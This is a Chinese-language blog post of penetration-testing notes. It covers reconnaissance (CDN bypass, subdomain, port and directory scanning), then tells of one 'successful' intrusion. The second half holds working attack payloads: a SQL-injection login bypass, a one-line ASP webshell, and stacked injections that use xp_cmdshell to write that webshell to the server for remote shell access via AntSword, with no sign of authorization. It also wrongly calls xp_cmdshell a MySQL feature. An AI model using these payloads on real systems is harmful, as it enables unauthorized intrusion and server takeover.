滲透過程

滲透流程

信息收集

1.IP信息

17CE

看是否存在cdn

存在的話,查找真實ip

  • 從國外去訪問,查看ip信息
  • 去掉www,然後查看ip信息

2.旁站信息

3.C段信息

4.子域名信息

  • layer子域名挖掘機
  • subdomain

5.端口信息

  • nmap
  • portscan

6.網站目錄信息

  • dirsearch
  • dirb

目的是擴大攻擊面,尋找防護薄弱點和可利用信息

尋找可能存在漏洞的地方

  • 登陸界面 可能存在sql注入,可以先使用admin’ or 1=1 --+ 之類的語句嘗試繞過

  • 搜索界面 可能存在sql注入和存儲型和DOM型xss等

  • 上傳界面 可以上傳一些木馬之類東西:

    eg:上傳一句話木馬,然後使用中國蟻劍去連接(中國菜刀沒有中國蟻劍好用!!)

  • 涉及密碼或者其它敏感信息的地方 可以進行抓包分析,查看請求包和響應包,看一下有沒有什麼可以利用的信息,或者有可以修改的參數之類的東西,如果有進行修改,理解每個參數的意義和變化

一次成功的經驗

收集信息發現子域名信息,找到一個可以利用的ip,進行端口掃描和網站目錄爆破,發現後臺管理界面,嘗試萬能密碼進行繞過,成功,裏面沒有什麼可以利用的信息,然後尋找上傳接口,然後發現可以從登陸界面上傳文件,

一句話木馬:

<%execute(request("kxc"))%>

mysql開啓存儲過程

exec master..xp_cmdshell

echo中使用^轉義特殊字符

ss' ;exec master..xp_cmdshell "echo dfvdf > D:\\KEFU\\a.asp"; --+

定義一個變量,然後將變量輸入到文件中

sa';declare @cmd sysname set @cmd = 'echo ^<^%execute^(request^("kxc"^)^)^%^> > D:\KEFU\1.asp' exec master..xp_cmdshell @cmd;--+

然後使用中國蟻劍連接,可以獲得服務器shell


參考鏈接

參考

發佈了31 篇原創文章 · 獲贊 19 · 訪問量 3067
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章